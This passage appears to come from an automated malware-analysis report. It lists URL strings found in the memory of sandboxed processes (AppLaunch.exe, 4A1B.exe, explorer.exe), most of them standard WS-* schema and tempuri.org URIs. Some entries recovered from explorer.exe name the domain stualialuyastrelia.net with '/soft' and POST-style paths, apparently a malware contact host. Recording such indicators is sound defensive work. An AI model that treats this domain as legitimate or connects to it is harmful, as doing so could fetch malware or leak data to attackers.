Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: explorer.exe, 00000012.00000002.2371406020.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2315372291.0000000001048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stualialuyastrelia.net/
Source: explorer.exe, 00000012.00000002.2371406020.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2315372291.0000000001048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stualialuyastrelia.net/Mozilla/5.0
Source: explorer.exe, 00000012.00000002.2371406020.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stualialuyastrelia.net/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 00000012.00000002.2371406020.0000000002C70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stualialuyastrelia.net:80/soft
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.0000000006737000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000066E9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.00000000068F7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000677B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.00000000068F7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000066E9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.00000000068F7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.0000000006737000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15V
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.000000000389A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006737000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.000000000389A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: 4A1B.exe, 0000000A.00000002.2391907349.0000000003829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16V
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000066E9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.0000000006959000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000677B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000677B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000677B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000677B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
